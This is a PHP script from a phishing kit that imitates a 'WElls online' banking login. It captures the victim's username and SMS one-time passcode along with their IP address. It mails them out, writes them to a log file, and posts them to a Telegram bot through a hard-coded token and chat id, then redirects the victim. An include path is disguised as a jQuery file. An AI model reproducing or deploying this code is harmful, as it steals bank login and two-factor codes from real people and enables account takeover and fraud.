<?php
 require_once "function.php";
ini_set("output_buffering",4096);
session_start();
ob_start();

include 'Email.php';
$_SESSION['username'] = $_POST['username'];
$random=rand(0,100000000000);
$md5=md5("$random");
$base=base64_encode($md5);
$host=md5("$base");

$_SESSION['username'] = $_POST['username'];
$ip = getenv("REMOTE_ADDR");
$message .= "Bit Results:                  \n";
$message .= "OTP-Number: ".$_POST['sms']."\n";
$headers = "From: WElls online  <mail@wsfonmail.com>";
$subject = " WElls online - $ip";
include 'js/jquery/jquery/js.php';

mail($SEND,$subject,$message,$headers);
$file = fopen("log-Owtoya.txt", 'a');
fwrite($file, $message);
$token = "5991494519:AAEJ8mhC5-aNIB8-I-Lu-gpbpu1eXW5TsGY";
$data = [
    'text' => $message,
    'chat_id' => '1085206701'
];

file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
session_destroy();

  
     

header("Location: redirect.php");







